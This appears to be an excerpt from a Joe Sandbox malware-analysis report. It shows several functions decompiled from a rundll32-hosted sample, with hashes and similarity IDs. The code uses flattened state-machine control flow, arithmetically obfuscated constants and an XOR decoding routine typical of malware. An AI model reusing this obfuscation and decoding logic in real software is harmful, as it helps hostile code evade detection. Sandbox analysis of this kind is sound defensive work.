                                                                                                                          0x00000000
                                                                                                                          0x007aa24b
                                                                                                                          0x007aa250
                                                                                                                          0x007aa265
                                                                                                                          0x007aa26a
                                                                                                                          0x007aa26f
                                                                                                                          0x007aa272
                                                                                                                          0x007aa278
                                                                                                                          0x007aa278
                                                                                                                          0x007aa272
                                                                                                                          0x00000000
                                                                                                                          0x007aa2d2
                                                                                                                          0x007aa2d2
                                                                                                                          0x007aa2e1
                                                                                                                          0x007aa2e7

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: D1
                                                                                                                          • API String ID: 0-2215811268
                                                                                                                          • Opcode ID: 39b04d9c761a6ec58368feb7e713a1010327504967a592c838574e40511ce2d5
                                                                                                                          • Instruction ID: 789d9859fd5095698768dc57fef179c89403820ca0d78e1dbfc809faffab4bae
                                                                                                                          • Opcode Fuzzy Hash: 39b04d9c761a6ec58368feb7e713a1010327504967a592c838574e40511ce2d5
                                                                                                                          • Instruction Fuzzy Hash: 67A142729083019FC758CF65C48940BBBF1BBC5354F148A2EF5A996260D7B9CA49CF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E007ABB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                          				void* _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				char _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				unsigned int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				void* _t138;
                                                                                                                          				intOrPtr _t161;
                                                                                                                          				void* _t162;
                                                                                                                          				void* _t164;
                                                                                                                          				signed int _t181;
                                                                                                                          				signed int _t182;
                                                                                                                          				signed int _t183;
                                                                                                                          				void* _t185;
                                                                                                                          				signed int* _t189;
                                                                                                                          
                                                                                                                          				_t162 = __ecx;
                                                                                                                          				_push(1);
                                                                                                                          				_push(1);
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t138);
                                                                                                                          				_v16 = 0xdfc885;
                                                                                                                          				_t189 =  &(( &_v76)[8]);
                                                                                                                          				asm("stosd");
                                                                                                                          				_t185 = 0;
                                                                                                                          				_t164 = 0xcc97672;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v32 = 0x60c2fa;
                                                                                                                          				_v32 = _v32 >> 3;
                                                                                                                          				_v32 = _v32 ^ 0x00046f58;
                                                                                                                          				_v76 = 0xb548f0;
                                                                                                                          				_v76 = _v76 >> 0xc;
                                                                                                                          				_t181 = 0xc;
                                                                                                                          				_v76 = _v76 * 0x3c;
                                                                                                                          				_v76 = _v76 + 0xffff64d0;
                                                                                                                          				_v76 = _v76 ^ 0x0001fd54;
                                                                                                                          				_v52 = 0x15927a;
                                                                                                                          				_v52 = _v52 / _t181;
                                                                                                                          				_v52 = _v52 ^ 0x000151ae;
                                                                                                                          				_v56 = 0xd6ed9;
                                                                                                                          				_t182 = 0x1a;
                                                                                                                          				_v56 = _v56 * 0x3f;
                                                                                                                          				_v56 = _v56 + 0xfffffbb4;
                                                                                                                          				_v56 = _v56 ^ 0x0345d46e;
                                                                                                                          				_v64 = 0xba2b53;
                                                                                                                          				_v64 = _v64 * 0x6d;
                                                                                                                          				_v64 = _v64 ^ 0x73d6d9cf;
                                                                                                                          				_v64 = _v64 * 0x31;
                                                                                                                          				_v64 = _v64 ^ 0x981330b4;
                                                                                                                          				_v60 = 0x269f8;
                                                                                                                          				_v60 = _v60 >> 5;
                                                                                                                          				_v60 = _v60 + 0xffffb859;
                                                                                                                          				_v60 = _v60 ^ 0xfff00afd;
                                                                                                                          				_v68 = 0xfd9147;
                                                                                                                          				_v68 = _v68 ^ 0x8de1643f;
                                                                                                                          				_v68 = _v68 / _t182;
                                                                                                                          				_v68 = _v68 >> 0xf;
                                                                                                                          				_v68 = _v68 ^ 0x000df039;
                                                                                                                          				_v72 = 0x5def36;
                                                                                                                          				_v72 = _v72 | 0xd620e1c7;
                                                                                                                          				_v72 = _v72 + 0xd307;
                                                                                                                          				_t183 = 0x48;
                                                                                                                          				_v72 = _v72 / _t183;
                                                                                                                          				_v72 = _v72 ^ 0x02f0e4dc;
                                                                                                                          				_v24 = 0xf7704c;
                                                                                                                          				_v24 = _v24 + 0x27dd;
                                                                                                                          				_v24 = _v24 ^ 0x00ff74b2;
                                                                                                                          				_v28 = 0x151ed9;
                                                                                                                          				_v28 = _v28 * 0x48;
                                                                                                                          				_v28 = _v28 ^ 0x05f046e2;
                                                                                                                          				_v36 = 0xddc4df;
                                                                                                                          				_v36 = _v36 >> 0xf;
                                                                                                                          				_v36 = _v36 | 0x7f83127d;
                                                                                                                          				_v36 = _v36 ^ 0x7f8e5ab1;
                                                                                                                          				_v40 = 0x29fd7f;
                                                                                                                          				_v40 = _v40 >> 7;
                                                                                                                          				_v40 = _v40 | 0x8d3b2756;
                                                                                                                          				_v40 = _v40 ^ 0x8d37b79a;
                                                                                                                          				_v44 = 0x8dc5a8;
                                                                                                                          				_v44 = _v44 * 0x63;
                                                                                                                          				_v44 = _v44 >> 4;
                                                                                                                          				_v44 = _v44 ^ 0x036b3557;
                                                                                                                          				_v48 = 0xd61f7e;
                                                                                                                          				_v48 = _v48 | 0xd43d52c3;
                                                                                                                          				_v48 = _v48 + 0xa376;
                                                                                                                          				_v48 = _v48 ^ 0xd504b7b0;
                                                                                                                          				_t184 = _v20;
                                                                                                                          				while(_t164 != 0x2524be6) {
                                                                                                                          					if(_t164 == 0xcc97672) {
                                                                                                                          						_t164 = 0xe41debb;
                                                                                                                          						continue;
                                                                                                                          					} else {
                                                                                                                          						if(_t164 == 0xdd773d9) {
                                                                                                                          							if(E007AD8EC(_v52, _v56,  &_v20, _t184) != 0) {
                                                                                                                          								_t164 = 0xe01b1ec;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t164 == 0xe01b1ec) {
                                                                                                                          								E007B0AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
                                                                                                                          								_t189 =  &(_t189[0xa]);
                                                                                                                          								_t164 = 0x2524be6;
                                                                                                                          								_t185 =  !=  ? 1 : _t185;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t164 != 0xe41debb) {
                                                                                                                          									L13:
                                                                                                                          									if(_t164 != 0x78a313b) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_t161 = E00793DE2(_t164);
                                                                                                                          									_t184 = _t161;
                                                                                                                          									if(_t161 != 0xffffffff) {
                                                                                                                          										_t164 = 0xdd773d9;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t185;
                                                                                                                          				}
                                                                                                                          				E007A1E67(_v36, _v40, _v44, _v48, _v20);
                                                                                                                          				_t189 =  &(_t189[3]);
                                                                                                                          				_t164 = 0x78a313b;
                                                                                                                          				goto L13;
                                                                                                                          			}






























                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6]
                                                                                                                          • API String ID: 0-3974934468
                                                                                                                          • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                          • Instruction ID: 18b50886841df4f1567ee324128897c9f2588c928b12f8af68996f1526e724f8
                                                                                                                          • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                          • Instruction Fuzzy Hash: 67713071208341AFC358CF25C88941BBBE1FFCA758F504A1DF69696261C376CA498F43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E00795361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				unsigned int _v4;
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				unsigned int _v32;
                                                                                                                          				void* __edx;
                                                                                                                          				void* _t84;
                                                                                                                          				void* _t104;
                                                                                                                          				void* _t118;
                                                                                                                          				signed int _t120;
                                                                                                                          				signed int _t121;
                                                                                                                          				signed int _t122;
                                                                                                                          				void* _t124;
                                                                                                                          				signed int* _t127;
                                                                                                                          
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				E007A20B9(_t84);
                                                                                                                          				_v4 = 0x18047d;
                                                                                                                          				_t127 =  &(( &_v32)[5]);
                                                                                                                          				_v4 = _v4 >> 0xa;
                                                                                                                          				_v4 = _v4 ^ 0x000d3248;
                                                                                                                          				_t124 = 0;
                                                                                                                          				_v28 = 0x90acd4;
                                                                                                                          				_t104 = 0x35df4ed;
                                                                                                                          				_v28 = _v28 >> 5;
                                                                                                                          				_v28 = _v28 + 0xffff3107;
                                                                                                                          				_v28 = _v28 | 0xd0f9b279;
                                                                                                                          				_v28 = _v28 ^ 0xd0f1daef;
                                                                                                                          				_v8 = 0x9d14b7;
                                                                                                                          				_v8 = _v8 << 2;
                                                                                                                          				_v8 = _v8 ^ 0x027823b1;
                                                                                                                          				_v32 = 0xfd6947;
                                                                                                                          				_v32 = _v32 + 0xffff03bf;
                                                                                                                          				_t120 = 0x72;
                                                                                                                          				_v32 = _v32 / _t120;
                                                                                                                          				_v32 = _v32 >> 0xa;
                                                                                                                          				_v32 = _v32 ^ 0x00066e44;
                                                                                                                          				_v16 = 0x111da;
                                                                                                                          				_v16 = _v16 ^ 0xdd7c73d4;
                                                                                                                          				_v16 = _v16 | 0x7d37165e;
                                                                                                                          				_v16 = _v16 ^ 0xfd769a76;
                                                                                                                          				_v12 = 0x2531de;
                                                                                                                          				_v12 = _v12 << 0xd;
                                                                                                                          				_v12 = _v12 ^ 0xa63e9142;
                                                                                                                          				_v20 = 0x6e0002;
                                                                                                                          				_v20 = _v20 >> 0xe;
                                                                                                                          				_t121 = 0xe;
                                                                                                                          				_v20 = _v20 / _t121;
                                                                                                                          				_t122 = 0x3d;
                                                                                                                          				_v20 = _v20 * 0x64;
                                                                                                                          				_v20 = _v20 ^ 0x000bef19;
                                                                                                                          				_v24 = 0xa3fc95;
                                                                                                                          				_v24 = _v24 + 0xdcd1;
                                                                                                                          				_v24 = _v24 << 3;
                                                                                                                          				_v24 = _v24 / _t122;
                                                                                                                          				_v24 = _v24 ^ 0x0013a2ec;
                                                                                                                          				while(_t104 != 0x311781) {
                                                                                                                          					if(_t104 == 0x35df4ed) {
                                                                                                                          						_push(_t104);
                                                                                                                          						_push(_t104);
                                                                                                                          						_t118 = 0x28;
                                                                                                                          						 *0x7b3e08 = E00797FF2(_t118);
                                                                                                                          						_t104 = 0x605992c;
                                                                                                                          						continue;
                                                                                                                          					} else {
                                                                                                                          						if(_t104 == 0x477ef52) {
                                                                                                                          							E0079924B();
                                                                                                                          							_t104 = 0x311781;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t104 == 0x605992c) {
                                                                                                                          								if(E007B0F33() != 0) {
                                                                                                                          									_t104 = 0xdb1ba22;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t104 != 0xdb1ba22) {
                                                                                                                          									L13:
                                                                                                                          									if(_t104 != 0x5723dc8) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_t124 = E0079960D(_v16, _a12, _a8, _v12);
                                                                                                                          									_t127 =  &(_t127[3]);
                                                                                                                          									if(_t124 == 0) {
                                                                                                                          										_t104 = 0x477ef52;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t124;
                                                                                                                          				}
                                                                                                                          				E007A8519(_v20, _v24,  *0x7b3e08);
                                                                                                                          				_t104 = 0x5723dc8;
                                                                                                                          				goto L13;
                                                                                                                          			}





















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: H2
                                                                                                                          • API String ID: 0-302591398
                                                                                                                          • Opcode ID: 02cfde5d70d92ca212a6bb0762004df0148329eab7078a50243751f0bda09c59
                                                                                                                          • Instruction ID: 399f7d9242e9ac85cf9711cbc2a53399655e10b64ccb7f88f97ecedaf37661db
                                                                                                                          • Opcode Fuzzy Hash: 02cfde5d70d92ca212a6bb0762004df0148329eab7078a50243751f0bda09c59
                                                                                                                          • Instruction Fuzzy Hash: 4D41C0326083419FCB65CF15E44A81FBBE2FBD8718F144A1DF58556221D7B8CA88CB87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E00798B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                          				char _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				void* _t83;
                                                                                                                          				void* _t89;
                                                                                                                          				signed int _t93;
                                                                                                                          				void* _t96;
                                                                                                                          				void* _t108;
                                                                                                                          				void* _t109;
                                                                                                                          				void* _t111;
                                                                                                                          				void* _t112;
                                                                                                                          
                                                                                                                          				_push(_a16);
                                                                                                                          				_t108 = __ecx;
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t83);
                                                                                                                          				_v72 = 0xbb1237;
                                                                                                                          				_t112 = _t111 + 0x18;
                                                                                                                          				_v72 = _v72 >> 0xf;
                                                                                                                          				_v72 = _v72 + 0xd544;
                                                                                                                          				_t109 = 0;
                                                                                                                          				_v72 = _v72 ^ 0x000eb3e9;
                                                                                                                          				_t96 = 0x815a082;
                                                                                                                          				_v48 = 0x50cb35;
                                                                                                                          				_v48 = _v48 + 0xffff87ec;
                                                                                                                          				_v48 = _v48 ^ 0x00585237;
                                                                                                                          				_v52 = 0xa4cd83;
                                                                                                                          				_v52 = _v52 ^ 0x5b114d95;
                                                                                                                          				_v52 = _v52 ^ 0x5bb6524d;
                                                                                                                          				_v56 = 0xbe8ecf;
                                                                                                                          				_v56 = _v56 << 0xe;
                                                                                                                          				_v56 = _v56 ^ 0xa3b0842f;
                                                                                                                          				_v60 = 0x771210;
                                                                                                                          				_v60 = _v60 | 0x3e44f288;
                                                                                                                          				_v60 = _v60 ^ 0x3e758d5b;
                                                                                                                          				_v80 = 0xf3b10d;
                                                                                                                          				_v80 = _v80 ^ 0x3cb59f0c;
                                                                                                                          				_v80 = _v80 >> 4;
                                                                                                                          				_v80 = _v80 + 0xffffd90b;
                                                                                                                          				_v80 = _v80 ^ 0x03c55d5e;
                                                                                                                          				_v64 = 0x352515;
                                                                                                                          				_v64 = _v64 ^ 0x7339bda5;
                                                                                                                          				_v64 = _v64 + 0x1326;
                                                                                                                          				_v64 = _v64 ^ 0x7306d08c;
                                                                                                                          				_v68 = 0x4f62f3;
                                                                                                                          				_v68 = _v68 << 0xd;
                                                                                                                          				_v68 = _v68 ^ 0x83faab25;
                                                                                                                          				_v68 = _v68 ^ 0x6fa8977d;
                                                                                                                          				_v76 = 0x2ac691;
                                                                                                                          				_v76 = _v76 << 9;
                                                                                                                          				_t93 = 0x6b;
                                                                                                                          				_v76 = _v76 / _t93;
                                                                                                                          				_v76 = _v76 << 0xc;
                                                                                                                          				_v76 = _v76 ^ 0xcae566b9;
                                                                                                                          				do {
                                                                                                                          					while(_t96 != 0x54856a9) {
                                                                                                                          						if(_t96 == 0x815a082) {
                                                                                                                          							_t96 = 0x54856a9;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t96 == 0xa9da54a) {
                                                                                                                          								_t89 = E007AD97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
                                                                                                                          								_t112 = _t112 + 0xc;
                                                                                                                          								__eflags = _t89;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_t96 = 0xefea9c1;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t118 = _t96 - 0xefea9c1;
                                                                                                                          								if(_t96 != 0xefea9c1) {
                                                                                                                          									goto L11;
                                                                                                                          								} else {
                                                                                                                          									E007AD97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
                                                                                                                          									_t109 =  !=  ? 1 : _t109;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L6:
                                                                                                                          						return _t109;
                                                                                                                          					}
                                                                                                                          					E00793DBC( &_v44, _a8, _v72, _v48, _v52);
                                                                                                                          					_t112 = _t112 + 0xc;
                                                                                                                          					_t96 = 0xa9da54a;
                                                                                                                          					L11:
                                                                                                                          					__eflags = _t96 - 0x309e957;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L6;
                                                                                                                          			}






















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 7RX
                                                                                                                          • API String ID: 0-861457431
                                                                                                                          • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                          • Instruction ID: 2fafb8270859364b2dcf1bbb161d03910585b426d6f8e087315932577c03741c
                                                                                                                          • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                          • Instruction Fuzzy Hash: 71417571109701DBCB94CE21D48982FBBE1FBC6B88F500A2DF59692220D775CA59CF97
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E007A7BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				void* _t53;
                                                                                                                          				signed int _t60;
                                                                                                                          				signed int _t67;
                                                                                                                          				unsigned int _t71;
                                                                                                                          				signed int _t74;
                                                                                                                          				signed int _t76;
                                                                                                                          				signed int _t77;
                                                                                                                          				void* _t85;
                                                                                                                          				signed int _t92;
                                                                                                                          				void* _t98;
                                                                                                                          				intOrPtr _t99;
                                                                                                                          				signed int* _t100;
                                                                                                                          				signed int* _t101;
                                                                                                                          				signed int* _t102;
                                                                                                                          
                                                                                                                          				_t100 = _a8;
                                                                                                                          				_t102 = __ecx;
                                                                                                                          				_push(_t100);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t53);
                                                                                                                          				_v12 = 0x7b3704;
                                                                                                                          				_t99 = 0;
                                                                                                                          				_v8 = 0x80915f;
                                                                                                                          				_v4 = 0;
                                                                                                                          				_v24 = 0xa71362;
                                                                                                                          				_v24 = _v24 << 0xb;
                                                                                                                          				_v24 = _v24 + 0x3e5;
                                                                                                                          				_v24 = _v24 ^ 0x3895df4e;
                                                                                                                          				_v28 = 0xc4b4e;
                                                                                                                          				_t76 = 0x2f;
                                                                                                                          				_v28 = _v28 * 0x14;
                                                                                                                          				_v28 = _v28 | 0x55175d82;
                                                                                                                          				_v28 = _v28 ^ 0x65144985;
                                                                                                                          				_v28 = _v28 ^ 0x30e15ded;
                                                                                                                          				_a8 = 0x3b45b7;
                                                                                                                          				_a8 = _a8 / _t76;
                                                                                                                          				_a8 = _a8 << 4;
                                                                                                                          				_t77 = 0x6c;
                                                                                                                          				_a8 = _a8 / _t77;
                                                                                                                          				_a8 = _a8 ^ 0x000cc8ea;
                                                                                                                          				_t60 =  *_t100;
                                                                                                                          				_t101 =  &(_t100[2]);
                                                                                                                          				_t92 = _t100[1] ^ _t60;
                                                                                                                          				_v20 = _t60;
                                                                                                                          				_v16 = _t92;
                                                                                                                          				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
                                                                                                                          				_t67 = E00797FF2(_t71);
                                                                                                                          				_a8 = _t67;
                                                                                                                          				if(_t67 != 0) {
                                                                                                                          					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
                                                                                                                          					if(_t98 != 0) {
                                                                                                                          						_t74 = _v20;
                                                                                                                          						_t85 = _t67 - _t101;
                                                                                                                          						do {
                                                                                                                          							_t99 = _t99 + 1;
                                                                                                                          							 *(_t85 + _t101) =  *_t101 ^ _t74;
                                                                                                                          							_t101 =  &(_t101[1]);
                                                                                                                          						} while (_t99 < _t98);
                                                                                                                          						_t67 = _a8;
                                                                                                                          					}
                                                                                                                          					if(_t102 != 0) {
                                                                                                                          						 *_t102 = _v16;
                                                                                                                          						return _t67;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t67;
                                                                                                                          			}

























                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ]0
                                                                                                                          • API String ID: 0-3096761382
                                                                                                                          • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                          • Instruction ID: 4fcec43e8183eb6c5a7587da78b64d31e39f1f7b89a99867839ab1b919dd3fd7
                                                                                                                          • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                          • Instruction Fuzzy Hash: 813197716093008FD318CF29C88590BFBE6EBC9718F008A2EF58993251DBB5E905CB56
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E00793C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				char _v564;
                                                                                                                          				void* _t97;
                                                                                                                          				signed int _t114;
                                                                                                                          				signed int _t115;
                                                                                                                          				signed int _t116;
                                                                                                                          
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t97);
                                                                                                                          				_v32 = 0xf161c0;
                                                                                                                          				_v32 = _v32 + 0xffff8ad4;
                                                                                                                          				_v32 = _v32 ^ 0x00fbd9a3;
                                                                                                                          				_v28 = 0xfc9039;
                                                                                                                          				_t114 = 0x1b;
                                                                                                                          				_v28 = _v28 / _t114;
                                                                                                                          				_t115 = 5;
                                                                                                                          				_v28 = _v28 * 0x6e;
                                                                                                                          				_v28 = _v28 ^ 0x040e4771;
                                                                                                                          				_v44 = 0x2ba482;
                                                                                                                          				_v44 = _v44 | 0x0543644d;
                                                                                                                          				_v44 = _v44 ^ 0x0568ae00;
                                                                                                                          				_v36 = 0xddb19;
                                                                                                                          				_t116 = 0x23;
                                                                                                                          				_v36 = _v36 / _t115;
                                                                                                                          				_v36 = _v36 ^ 0x000396ce;
                                                                                                                          				_v8 = 0xc420c0;
                                                                                                                          				_v8 = _v8 >> 8;
                                                                                                                          				_v8 = _v8 + 0xffff6316;
                                                                                                                          				_v8 = _v8 * 0x7a;
                                                                                                                          				_v8 = _v8 ^ 0x001ea2c5;
                                                                                                                          				_v12 = 0xb92025;
                                                                                                                          				_v12 = _v12 >> 3;
                                                                                                                          				_v12 = _v12 + 0xfe32;
                                                                                                                          				_v12 = _v12 << 0xe;
                                                                                                                          				_v12 = _v12 ^ 0x088e8322;
                                                                                                                          				_v24 = 0x144a1a;
                                                                                                                          				_v24 = _v24 + 0xffffa246;
                                                                                                                          				_v24 = _v24 + 0xffff01e3;
                                                                                                                          				_v24 = _v24 ^ 0x001122d6;
                                                                                                                          				_v16 = 0x7d3361;
                                                                                                                          				_v16 = _v16 / _t116;
                                                                                                                          				_v16 = _v16 << 4;
                                                                                                                          				_v16 = _v16 >> 9;
                                                                                                                          				_v16 = _v16 ^ 0x00004840;
                                                                                                                          				_v20 = 0xb3d6e6;
                                                                                                                          				_v20 = _v20 ^ 0x61ac6c83;
                                                                                                                          				_v20 = _v20 ^ 0xeb92407c;
                                                                                                                          				_v20 = _v20 ^ 0x8a8fe9bf;
                                                                                                                          				_v40 = 0xbcf254;
                                                                                                                          				_v40 = _v40 << 0xc;
                                                                                                                          				_v40 = _v40 ^ 0xcf275652;
                                                                                                                          				_push(_v44);
                                                                                                                          				_push(_v28);
                                                                                                                          				E0079A918(_a4, _v40, _v36, _v8, E007ADCF7(_v32, 0x7917c0, _v40), _v12,  &_v564);
                                                                                                                          				E0079A8B0(_v24, _t107, _v16);
                                                                                                                          				return E007A1F8A(_v20, _v40,  &_v564);
                                                                                                                          			}



















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: a3}
                                                                                                                          • API String ID: 0-1821053108
